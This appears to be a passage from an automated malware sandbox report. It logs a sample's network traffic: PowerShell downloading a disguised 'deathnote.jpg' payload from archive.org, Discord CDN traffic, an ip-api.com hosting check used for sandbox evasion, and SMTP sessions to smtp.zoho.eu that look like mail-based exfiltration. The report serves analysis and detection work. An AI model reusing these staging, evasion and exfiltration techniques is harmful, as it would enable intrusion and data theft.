                                                Aug 27, 2024 07:53:46.070538044 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070600986 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070611000 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070847988 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070898056 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070905924 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070910931 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070924997 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070952892 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070957899 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070987940 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.071001053 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.071384907 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.071494102 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.072837114 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.072896957 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.072922945 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.072957993 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.072988033 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.072993040 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.073020935 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.073044062 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.107790947 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.107825041 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.107973099 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.108009100 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.108036041 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.108057976 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183471918 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183522940 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183557987 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183561087 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183587074 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183624983 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183628082 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183674097 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183675051 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183684111 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183708906 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183722973 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183732033 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183744907 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183773041 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.184007883 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.184065104 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.184122086 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.184176922 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.184194088 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.184246063 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.186587095 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.186630011 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.186656952 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.186678886 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.186691046 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.186717033 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.187434912 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.187448978 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.187510014 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.187520027 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.187561989 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.188097954 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.188111067 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.188169003 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.188177109 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.188215017 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272124052 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272140980 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272337914 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272362947 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272535086 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272538900 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272547007 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272584915 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272613049 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272623062 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272651911 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272669077 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.273015022 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.273029089 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.273089886 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.273094893 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.273133993 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.275391102 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.275407076 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.275486946 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.275490999 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.275530100 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.276473999 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.276544094 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.276547909 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.276561022 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.276592016 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.276626110 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.277038097 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:47.336985111 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:47.341841936 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:53:47.341926098 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:47.342854977 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:47.347744942 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:53:47.801292896 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:53:47.851815939 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:48.525743008 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:48.534706116 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:48.534809113 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.107600927 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.108108044 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.113168001 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.404326916 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.434470892 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.439394951 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.610611916 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.622333050 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.627376080 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800081015 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800103903 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800117970 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800172091 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.802826881 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.809654951 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.124768019 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.141884089 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.147034883 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.318448067 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.367460012 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.406318903 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.407747030 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.412547112 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.583787918 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.584105015 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.588922024 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.800534964 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.800803900 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.805660009 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.977885962 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.978157043 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.983074903 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.154253006 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.154510975 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.159373045 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.330560923 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.331178904 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.331233025 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.331271887 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.331295967 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.336061954 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.336076021 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.336215973 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.336225986 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.777726889 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.833597898 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.838540077 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009761095 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009854078 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009903908 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009958029 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.013678074 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.014499903 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.239228010 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.239347935 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.821928978 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.822129965 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.826987982 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.002490044 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.070626974 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.133933067 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.134187937 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.139039040 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.312863111 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.313545942 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.318351030 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494445086 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494467020 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494477987 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494579077 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.496202946 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.501022100 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.674931049 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.676424980 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.681361914 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.855225086 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.855587959 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.860527039 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.198627949 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.198992014 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.203830004 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.388289928 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.388765097 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.393671989 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.569231987 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.569535017 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.574444056 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.749825954 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.750123024 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.755079985 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.928742886 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.930334091 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930396080 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930438042 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930485010 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930526972 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930567026 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930613041 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930643082 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930677891 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930705070 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.935307026 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935337067 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935379028 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935389042 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935477972 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935487032 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:55.393177986 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:55.461230040 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:54:38.523891926 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:54:38.529010057 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:54:38.529097080 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:55:28.539633989 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:55:28.546472073 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720165968 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720554113 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720597029 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:55:28.720664024 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720705986 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:55:28.720792055 CEST49708587192.168.2.5185.230.212.164
                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 27, 2024 07:53:42.287723064 CEST5141253192.168.2.51.1.1.1
                                                Aug 27, 2024 07:53:42.438308954 CEST53514121.1.1.1192.168.2.5
                                                Aug 27, 2024 07:53:45.170854092 CEST4940653192.168.2.51.1.1.1
                                                Aug 27, 2024 07:53:45.177987099 CEST53494061.1.1.1192.168.2.5
                                                Aug 27, 2024 07:53:47.322359085 CEST5604853192.168.2.51.1.1.1
                                                Aug 27, 2024 07:53:47.329617977 CEST53560481.1.1.1192.168.2.5
                                                Aug 27, 2024 07:53:48.514555931 CEST4972653192.168.2.51.1.1.1
                                                Aug 27, 2024 07:53:48.525002003 CEST53497261.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 27, 2024 07:53:42.287723064 CEST192.168.2.51.1.1.10xe8c3Standard query (0)ia601606.us.archive.orgA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:45.170854092 CEST192.168.2.51.1.1.10xbd3cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:47.322359085 CEST192.168.2.51.1.1.10x6290Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:48.514555931 CEST192.168.2.51.1.1.10xd53bStandard query (0)smtp.zoho.euA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 27, 2024 07:53:42.438308954 CEST1.1.1.1192.168.2.50xe8c3No error (0)ia601606.us.archive.org207.241.227.86A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:45.177987099 CEST1.1.1.1192.168.2.50xbd3cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:45.177987099 CEST1.1.1.1192.168.2.50xbd3cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:45.177987099 CEST1.1.1.1192.168.2.50xbd3cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:45.177987099 CEST1.1.1.1192.168.2.50xbd3cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:45.177987099 CEST1.1.1.1192.168.2.50xbd3cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:47.329617977 CEST1.1.1.1192.168.2.50x6290No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:53:48.525002003 CEST1.1.1.1192.168.2.50xd53bNo error (0)smtp.zoho.eu185.230.212.164A (IP address)IN (0x0001)false
                                                • ia601606.us.archive.org
                                                • cdn.discordapp.com
                                                • ip-api.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549706208.95.112.1801632C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:53:47.342854977 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                Host: ip-api.com
                                                Connection: Keep-Alive
                                                Aug 27, 2024 07:53:47.801292896 CEST175INHTTP/1.1 200 OK
                                                Date: Tue, 27 Aug 2024 05:53:47 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 6
                                                Access-Control-Allow-Origin: *
                                                X-Ttl: 60
                                                X-Rl: 44
                                                Data Raw: 66 61 6c 73 65 0a
                                                Data Ascii: false


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704207.241.227.864431964C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 05:53:43 UTC112OUTGET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1
                                                Host: ia601606.us.archive.org
                                                Connection: Keep-Alive
                                                2024-08-27 05:53:43 UTC582INHTTP/1.1 200 OK
                                                Server: nginx/1.25.1
                                                Date: Tue, 27 Aug 2024 05:53:43 GMT
                                                Content-Type: image/jpeg
                                                Content-Length: 1931225
                                                Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT
                                                Connection: close
                                                ETag: "66a41e98-1d77d9"
                                                Strict-Transport-Security: max-age=15724800
                                                Expires: Tue, 27 Aug 2024 11:53:43 GMT
                                                Cache-Control: max-age=21600
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                Access-Control-Allow-Credentials: true
                                                Accept-Ranges: bytes
                                                2024-08-27 05:53:43 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                2024-08-27 05:53:43 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                                Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                                2024-08-27 05:53:43 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                                Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
